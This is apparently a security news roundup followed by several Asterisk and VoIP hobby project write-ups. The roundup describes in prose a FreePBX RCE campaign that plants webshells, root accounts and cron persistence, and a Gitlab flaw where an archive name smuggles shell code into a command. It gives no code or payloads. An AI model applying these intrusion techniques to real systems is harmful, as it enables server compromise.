This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

There’s an ongoing campaign that’s compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, using CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. This flaw was a 0-day, as it was discovered by analyzing a compromised FreePBX system. It’s unclear if the campaign described in last week’s report was using the 0-day back in December, or if it was launched as a result of the public disclosure of the bug.

Regardless, the CVE is a URL parameter sent to the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, and allow end users to set features like Do Not Disturb without having to punch in star codes, or visit a web page. Because of the use case, any FreePBX deployment that supports VoIP phones connecting from outside the network, that use this feature, would need these ports open. The best way to secure that would be to enforce connections over a VPN, which only some phones natively support.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, all obfuscated slightly differently. It then creates multiple root-level user accounts, and adds a Cron job to maintain access. There is a surprising amount of obfuscation and stealth features in this family of malware, making it difficult to point to a single Indicator Of Compromise. If you run a FreePBX system that may have the Phone Apps module running, it’s time to go through it with a fine-toothed comb.

What’s The Deal with TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both of them trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just go open up the Google Play Store and see the exact permissions the TikTok app uses, Google has made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems like Google agrees. Just before this article went to the presses, Google announced that they were walking back this decision.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so, that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can manipulate the value given for the archive name, and avoid tripping on any of the checks intended to prevent it, you can trivially insert shell code that will be run on the underlying server. Avoiding the traps is a big part of the work to actually make this into an real PoC. Read the post for full details on the debugging journey.

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is Calendar spam. Google Calendar is great, because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect, it seems obvious that this would be used for spam. Regardless, after multiple years of the spam problem, Google is finally rolling out a feature, to only add invitations to your calendar from known senders. Now if you get asked, or suffer from spam yourself, you know to look under event settings, and make the setting change. Finally!

Convert A Rotary Phone To VOIP Using Raspberry Pi

There’s something so nostalgic about the rotary phone that makes it a fun thing to hack and modernize. [Voidon] put his skills to the test and converted one to VoIP using a Raspberry Pi. He used the RasPi’s GPIO pins to read pulses from the rotary dial – a functional dial is always a welcome feature in rotary phone hacks. An old USB sound card was perfect for the microphone and handset audio.

As with any build, there were unexpected size issues that needed to be worked around. While the RasPi fit inside the case well, there was no room for the USB power jack or an ethernet cable, let alone a USB power bank for portability. The power bank idea was scrapped. [voidon] soldered the power cord to the RasPi before the polyfuse to preserve the surge protection, used a mini-USB wifi dongle, and soldered a new USB connector to the sound card. [Voidon] also couldn’t get the phone’s original ringer to work, so he used the Raspberry Pi’s internal sound card to play ringtones.

The VoIP (SIP) was managed by some Python scripting, available at GitHub. [voidon] has some experience in using Asterisk at his day job, so it will be interesting to see if he incorporates it in the future.

[via Reddit]

 

 

switchboard

Bypassing Broken SIP ALG Implementations

The SIP protocol is commonly used for IP telephone communications. Unfortunately it’s notorious for having issues with NAT traversal. Even some major vendors can’t seem to get it right. [Stephen] had this problem with his Cisco WRVS4400N router. After a bit of troubleshooting, he was able to come up with a workaround that others may find useful.

The router had built in SIP ALG functionality, but it just didn’t work. [Stephen] was trying to route SIP traffic from a phone to an Asterisk PBX system behind the router. The router just couldn’t properly handle these packets regardless of whether SIP ALG was enabled or disabled.

[Stephen] first tried to change the SIP port on the external VOIP phone from the default of 5060 to something else. Then he setup port forwarding on the router to the Asterisk box to forward the traffic to the Asterisk system on the original port. This sort of worked. The calls would go through but they would eventually drop after about 20 seconds.

The only thing that [Stephen] could get to work completely was to change the SIP port in Asterisk’s sip.conf file using the “bindport” directive. He changed it to some random unused high port number. Then he setup port forwarding on the router to forward incoming UDP packets on that port to the Asterisk system. This worked fine, but now all of the original phones behind the router stopped working because they were configured to use the default port of 5060.

Rather than re-configure all of the phones in the organization, [Stephen] made one change on the Asterisk system. He setup an iptables rule to forward all incoming traffic on UDP port 5060 to the new SIP port. Now all of the phones are working with minimal changes across the organization. It’s a lot of hassle to go through just because the router couldn’t handle SIP correctly, but it gets the job done.

phone controller

Breathe New Life Into Payphones With Asterisk

Payphones used to be found on just about every street corner. They were a convenience, now replaced by the ubiquitous mobile phone. These machines were the stomping grounds for many early computer hackers, and as a result hold a place in hacker history. If you’ve ever wanted to re-live the good ol’ days, [hharte’s] project might be for you.

[hharte] has been working to make these old payphones useful again with some custom hardware and software. The project intends to be an interface between a payphone and an Asterisk PBX system. On the hardware side, the controller board is capable of switching various high voltage signals required for coin-line signaling. The controller uses a Teensy microcontroller to detect the hook status as well as to control the relays. The current firmware features are very basic, but functional.

[hharte] also wrote a custom AGI script for Asterisk. This script allows Asterisk to detect the 1700hz and 2200hz tones transmitted when coins are placed into the machine. The script is also in an early stage, but it will prompt for money and then place the call once 25 cents has been deposited. All of the schematics and code can be found on the project’s github page.

[Thanks mies]

Hacking A Pogoplug Into A $20 PBX

The Pogoplug Series 4 is a little network attached device that makes your external drives accessible remotely. Under the hood of this device is an ARM processor running at 800 MHz, which is supported by the Linux kernel. If you’re looking to build your own PBX on the cheap, [Ward] runs us through the process. Since the Pogoplug 4 is currently available for about $20, it’s a cheap way to play with telephony.

Step one is to convert the Pogoplug to Debian, which mostly requires following instructions carefully. After the Pogoplug is booting Debian, the Incredible PBX bundle can be installed. We’ve seen this bundle running on a Raspberry Pi in the past. Incredible PBX’s preconfigured setup based on Asterisk and FreePBX gives a ton of functionality out of the box.

With your $20 PBX running, there’s a lot that can be done. Google’s Voice service allows unlimited free calling to the USA and Canada. With Internet connectivity, you get email notifications for voicemails, and can query WolframAlpha by voice.

Get Phone Calls Answered With The Moshi Moshi

Moshi Moshi

Have a significant other that isn’t the best at picking up the phone? [Aaron] was having a hard time reaching his wife, so he hacked up a solution. The Moshi Moshi detects calls from [Aaron], and plays music to get her attention.

A remote server running Asterisk picks up the call and uses a Ruby script to log the call. Every ten seconds, an Arduino Due with an Ethernet shield polls a Sinatra web server to see if a call has arrived. If a new call has come in, a music loop is played. Getting the Due to loop audio was a bit of a challenge, but the end result sounds good.

Quite a bit of tech is brought together to make the Moshi Moshi, and all the code is provided in the write up. This could be helpful to anyone looking to combine hardware with the Asterisk PBX. After the break, [Aaron] shows us how the system works.

Continue reading “Get Phone Calls Answered With The Moshi Moshi”

Building A PBX Setup Around The Raspberry Pi

We’re not sure why this use didn’t immediately come to mind when we got our hands on a Raspberry Pi board, but the hardware is almost perfect as a PBX system. PBX, or Private Branch Exchange, is basically an in-house phone system. This guide which [Ward] put together shows you how to do some interesting things with it.

When talking about PBX setups the most common software package is Asterisk. That’s what’s at work here, rolled up with a bunch of other helpful software in an RPi targeted distro called Incredible PBX. All it takes to get up and running is to partition and burn the image to an SD like any other RPi distro. The configuration ends up being most of the work, starting with changing the default password, and moving on to customizing the environment to match your phone numbers and your needs. As with PBX setups on other embedded Linux devices, Google Voice is your best friend. The service will set you up with a free phone number.

This guide doesn’t delve into hardware connected hand sets. You’ll need to use a SIP phone. But that’s easy enough as there are free apps for most smart phones that will do the trick.

[Thanks Jamie]